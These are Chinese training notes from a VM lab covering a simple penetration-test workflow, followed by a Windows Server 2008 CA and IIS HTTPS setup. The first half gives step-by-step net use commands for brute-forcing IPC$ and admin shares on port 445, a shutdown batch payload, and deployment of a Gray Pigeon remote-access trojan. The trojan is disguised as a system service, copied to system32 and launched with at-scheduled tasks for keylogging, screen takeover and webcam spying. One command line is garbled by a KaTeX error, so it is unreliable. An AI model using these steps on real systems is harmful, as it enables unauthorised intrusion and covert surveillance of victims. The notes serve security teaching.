day09渗透简单测试流程以及PKI实验
0.授权
1.信息收集nslookup、whois(域名、子域名)
2.扫描漏洞
namp=ip范围 端口80(IIS,apache,什么网站)
高级扫描如IIS漏洞 2003----IIS6.0 2008-----IIS7.0
扫描网站漏洞scanport linux里头的namp
好用
也可以手动测试端口号是否开放,利用telnet ip地址 测试端口
3.漏洞利用
4.提权
5.擦除痕迹(毁尸灭迹)
6.留后门
7.渗透测试报告
winxp win2003
还原快照
员工 服务器
vmnet2 vmnet2
10.1.1.1 10.1.1.2
255.255.255.0
配好之后查看10.1.1.1是否能ping通10.1.1.2
ping不通也有可能是ip未配好,卡死
445端口可用来攻击共享端口
scanport软件,xp自带解压缩,右键全部提取
起始10.1.1.1终10.1.1.254—80,445,23----超时200ms------线程10-----单位时间同时扫描几个
也可以用2003-----服务----启用telnet
xp:telnet 10.1.1.2
telnet 10.1.1.2 445开了
telnet 10.1.1.2 446未开
现实环境:其实10.0.105.1-----10.0.105.254—80,23,3389,445
445漏洞利用:
2003 D:\share 共享完全控制
xp---------cmd--------net use f: \10.1.1.2\share 123.com /user:administrator
远程共享文件夹映射到本地f盘
xp:我的电脑—f盘
f:回车
md feifei
查看映射列表:net use
关闭映射:net use f: /del
net use */del
net use \10.1.1.2\share
net use c$
net use ipc$
暴力破解密码:
net use f: \10.1.1.2\share 密码 /user:用户
net use f: /del
net use */del
net use f: \10.1.1.2\c$
net use f: \10.1.1.2\ipc$
安全策略:服务器管理者对administrator改名,将administrator和guest账户调换名字
暴力破解系统密码远程之445:
xp----系统右键设置—安全素材.iso—安装解压缩软件和ntscan10
ntscan网络扫描ipc$
该软件的原理就是一点开始频繁使用net use命令试账号名和密码名
10.1.1.2—10.1.1.2
speed保持默认或慢一点,该软件生成不了密码需要别的软件—密码字典生成工具—NT_user用户字典,NT_pass密码字典右键打开方式记事本查看生成的
真实机密码字典生成工具—以管理员身份运行—会卡----关一个别的窗口就出现了
生成位数1-3 开始制作4.16M
1-8 TB
6-8 TB
亦思社会工程学密码生成器
直接写123.com—start
xp:cmd—net use f:\10.1.1.2\c$ 123.com /user:administrator
d:
copy con haha.bat
shutdown -s -t 100
ctrl+Z
copy haha.bat f:
xp:net use 暴力破解占用资源太多,重启xp即可
net use f: /del
永久映射盘符:我的电脑----右键----映射网络驱动器—f \10.1.1.2\share-----登录时重新连接—使用其他用户名连接
net use f: /del
net use \10.1.1.2\ipc$ 123.com /user:administrator
f:
dir d:
dir \10.1.1.2\share
dir \10.1.1.2\c$
d$
echo 10.1.1.1 www.baidu.com >>10.1.1.2
如何留后门:
木马对电脑无害
鸽子牧民战天兔杀软件解压----鸽子牧民战天专版—配置服务程序—安装选项----选择图标----勾选写入注册表启动项勾选优先安装成服务启动—路径改显示名称:systemd 服务名称system demo —woshixiaohei–自动上线设置10.1.1.1—保留路径D盘—heihei
cd
copy d:\heihei.exe \10.1.1.2\cKaTeX parse error: Undefined control sequence: \windows at position 1: \̲w̲i̲n̲d̲o̲w̲s̲\system32\ \\10…\windows\system32\heihei.exe
下载到本地运行操作自己的服务器(未成功在服务器上运行)
打开telnet服务,前提IPc$
计划命令定时执行:at \10.1.1.2 2:2 “C:”
2:2是服务器上时间,时间未知
net time \10.1.1.2 查看10.1.1.2的时间
at \10.1.1.2 11:19 “C:\windows\system32\heihie.exe”
at \10.1.1.2查看10.1.1.2的计划任务
at查看本地计划任务
制作木马:
copy植入木马
net time \10.1.1.2
at \10.1.1.2 11:11 “C:\windows\system32\heihei.bat”
等待超时
未执行时间离得太近,自动调整计划任务为明天
自动上线主机
远程电脑—注册表
telnet----d:----md yedaociyiyou
捕获屏幕—左上角接管----打开一个网站
可植入键盘植入程序
开启视频监控
1.scanport扫描445端口
2.漏洞利用之ipc$
进行暴力破解ntscan
3.net use
4.制作木马
使用灰鸽子软件
5.植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
6.设置计划任务自动执行木马
7.等待肉鸡上线
CA是权威证书颁发机构,为了公正“公钥”的合法性
机密性:使用对方的公钥加密
身份认证/数字管理:使用自己的私钥
win7 win2008
关闭防火墙 关闭
vmnet2 vmnet2
去掉勾选ipv6 去掉
10.1.1.1 10.1.1.2
255.255.255.0 255.255.255.0
DNS:10.1.1.1 127.0.0.1
安装了DC可以自动自己指向自己,未装DC不可自己指向自己,需要手动指向DNS
win7:ping 10.1.1.2看是否通
2008默认网站默认http80端口,升级为https 443端口,使用ssl加密技术(PKI),即公证装CA服务器
2008-------计算机右键管理----添加角色----IIS----下一步----勾选应用程序开发----下一步----安装—做一个网页----flower复制到E盘下-----完成
开始-----管理工具----IIS—网站-----默认站点(不要停用不要删除因为证书申请要用到这个站点)-----右键-----编辑绑定----网站-----添加网站—flower----E:\flower-----https不可设置只能设置http因为没有SSL证书所以需要先申请证书http 10.1.1.2 主机名www.qf.com----flower默认文档----添加flower.html上移
2008安装DNS-----计算机----右键管理----添加角色----DNS回车
开始-----管理工具----右键新建区域qf.com----下一步
新建主机名—www 10.1.1.2—完成
win7:http://www.qf.com
https://
2008装CA:计算机右键管理----添加角色—AD证书服务勾上----回车----勾选证书颁发机构、勾选证书颁发机构web注册—下一步(有域选企业,无域选独立)----根CA—新建私钥----选择加密算法RSA 2048-----最好不改,qf-CA----CA有效期指的是CA自己证书的有效期-----日志设置----下一步
开始----管理工具-----证书颁发机构CA----flower----服务器名称选中----服务器证书-----创建证书申请----www.qf.com qf bj bj CN----加密服务程序2048----文件名桌面IIS-SQ—完成
桌面IIS-SQ.txt
怎么提交给CA-----IE----输入10.1.1.2、certsrv回车—申请证书----(web浏览器证书给员工申请)高级申请—使用base64编码—双击打开桌面IIS-SQ.txt复制粘贴—提交----添加添加关闭—如何阻止弹窗呢?-----计算机右键----开始管理-----服务器管理器----IE增强的安全配置—配置IEDES禁用
CA:挂起的申请—右键所有任务—属性—右键颁发
IE重新访问查看挂起的证书DER编码下载证书----保存名字flower-DA(数字证书)—保存到桌面
开始管理工具—IIS—服务器右侧—完成证书申请—浏览选中证书—flower-dc—确定
网站flower----编辑绑定—编辑—添加—https—ssl证书flower-dc—确定
flower右侧—ssl设置----勾选要求ssl 忽略–应用
win7—IE—https://www.qf.com
此电脑的安全证书有问题继续信任?
http://www.peraglobab.com
浏览器工具—internet选项—内容—证书----受信任的根CA颁发机构----http://www.qf.com
实验步骤:
1.配置服务器ip地址10.1.1.2/24
2.安装iis服务器建立一个站点(必须使用域名),在xp客户机上设置hosts,并初步验证访问http://www.qf.com一下
3.安装CA组件
4.打开iis,先生成证书申请文件
5.向CA申请证书:
打开网页http://10.1.1.2/certsrv并向CA发送web服务器申请文件
6.CA颁发证书
7.在web服务器上下载并完成安装
8.在web服务器上启用ssl443
9.在客户机上修改hosts文件并验证
10.要求用户必须使用443访问,不能使用80访问
win7 win2008
v2 v2
10.1.1.2 10.1.1.1
255.255.255.0
DNS:10.1.1.1
win7:ping 10.1.1.1看通不通
关闭IE弹窗:
计算机管理—iis----服务器管理器----配置IE ESC—禁用
计算机管理添加—添加角色----DNS—IIS回车—应用程序开发回车—flower复制到E盘
打开DNS新建区域—qf.com—新建主机www 10.1.1.1
iis-----添加网站flower----www.qf.com —http
flower默认文档flower.html上移
win7IE:http://www.qf.com
装CA—添加角色—选择证书服务web注册机构----名字gong-CA—回车
打开CA—iis—服务器—服务器证书—证书申请—通用名称:www.qf.com(不能瞎写)—qfqfbjbjCN—下一步放桌面123
打开复制粘贴----10.1.1.1/certsrv—申请证书—高级证书申请—粘贴—提交
证书颁发机构----挂起—颁发
打开10.1.1.1/certsrv下载放桌面
CA:完成证书申请—好记名称flower
flower—编辑绑定----https10.1.1.1----flower
ssl设置:已开启https基础上的设置
小飞不认识gong-CA
win7信任gong-CA
1.10.1.1.1\certsrv下载CA证书
2.IE—工具—Internet选项—内容—证书—导入CA证书----下一步
win10菜单-----工具----Internet选项
ssl设置必需
https://www.qf.com—禁止访问—无证书
10.1.1.1/certsrv—申请证书—web浏览器证书----
iis默认站点—编辑绑定CA.qf.com 10.1.1.1
DNS新建主机记录CA 10.1.1.1
iis—服务器申请—ca.qf.com—桌面ca
打开CA复制粘贴http://ca.qf.com\certsrv
高级申请—提交
管理工具CA—挂起颁发—http://ca.qf.com\certsrv查看挂起下载证书—完成申请—找到ca
右键编辑绑定—ca—确定
flower右键编辑绑定flower确定
flower停default web启用
ie:申请证书web浏览器证书提交----服务器颁发----查看挂起—安全证书
flower启用确认
删除CA清浏览器缓存
flower–编辑绑定flower----win7—www.flower.com拒绝访问用win2008验证一下发现win7有问题
day09渗透简单测试流程以及PKI实验相关推荐
- 《网络安全工程师笔记》 第十四章:渗透简单测试流程
注:本笔记来自温晓飞老师的网络安全课程 第十四章:渗透简单测试流程 第一章:虚拟化架构与系统部署 第二章:IP地址详解 第三章:进制转换 第四章:DOS基本命令与批处理 第五章:用户与组管理 第六章: ...
- 第18节 渗透测试流程和简单案例
渗透测试流程和简单案例 1渗透测试概述 2渗透测试大致流程 3简单实验 3.1扫描 3.2利用共享服务端口445漏洞之IPC$ 3.3修改用户名增加暴力破解难度的方式 3.4暴力破解密码 3.5漏洞利 ...
- 【CyberSecurityLearning 51】渗透测试方法论+渗透测试流程
目录 渗透测试方法论 渗透测试(penetration testing,pentest) 渗透测试种类 * 黑盒测试 * 白盒测试 * 脆弱性评估与渗透测试 安全测试方法论 * 开放式web 应用程序 ...
- 通用渗透测试框架、简化渗透测试流程
文章目录 通用渗透测试框架 简化的渗透测试流程 黑客攻击的一般过程 通用渗透测试框架 从技术管理的角度来看,遵循正规的测试框架对安全测试极为重要.通用渗透测试框架涵盖了典型的审计测试工作和渗透测试工作 ...
- 渗透测试流程及方法论讲解(web安全入门04)
一.渗透测试方法论 1.1 渗透测试(penetration testing,pentest) 是实施安全评估(即审计)的具体手段. 方法论是在制定.实施信息安全审计方案时,需要遵循的规则.惯例和过程 ...
- 渗透测试流程(单台服务器)
渗透测试流程(单台服务器) 转载于:https://www.cnblogs.com/sky--/p/5781432.html
- 渗透测试入门17之一次完整的渗透测试流程
一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...
- 渗透测试流程信息收集
渗透测试是一种评估方法,一种通过模拟黑客的攻击方式,来评估网站安全的方法 渗透测试流程分为7个阶段 信息收集 漏洞扫描 漏洞利用 内网转发 内网渗透 痕迹清除 编写报告 但在这7个阶段之前还有一个前提 ...
- 渗透测试八个步骤【渗透测试流程】
渗透测试遵循软件测试的基本流程,但由于其测试过程与目标的特殊性,在具体实现步骤上渗透测试与常见软件测试并不相同.渗透测试流程主要包括8个步骤,如下图所示: 下面结合上图介绍每一个步骤所要完成的任务. ...
- 渗透测试流程(基础理论)
当时考nisp二级时所学的理论,记录下来复习使用. 渗透测试流程 1.专用术语介绍 1.脚本(asp.php.jsp) 2.html (css.js.html) 3.HTTP协议 4. ...
最新文章
- 为什么应该安装使用 Arch Linux
- lampp mysql 等待响应时间很长_XAMPP 的 phpMyAdmin 就会有文件大小限制、上传超时等各种问题...
- python统计分析--2.预分析:异常值、缺失值处理
- 排序算法-C++实现
- Standard Driver Routines(标准驱动程序)
- Linux(CentOS)网络流量实时监控(iftop)
- Scrum立会报告+燃尽图(Beta阶段第一次)
- 职场攻略:每天淘汰自己的不足
- 计算机专业计算机二级java有用吗_计算机二级java含金量如何 对就业有帮助吗
- WebServer服务器
- 关于MSHTML、IHTMLDocument、Ihtmldocument2-5的区别及 document.execCommand方法详解
- java 错误代码2503_错误代码:11300001 数据集配置错误
- 卫星地图-resolution和scale解析
- php搜索功能与jquery搜索功能,JavaScript_基于jQuery实现页面搜索功能,jQuery实现页面搜索,搜索筛选 - phpStudy...
- ChromiumOS的分区格式
- 计算机软件质测试标准,软件产品质量要求和测试细则 ——GB/T 25000.51—2016标准实施指南...
- ubuntu 自动登录账户_Ubuntu如何启用root默认自动登录
- RuoYi-Vue前后端分离
- base64字符串转化成图片
- 从二维向量跟虚数的区别到欧拉公式,复指数函数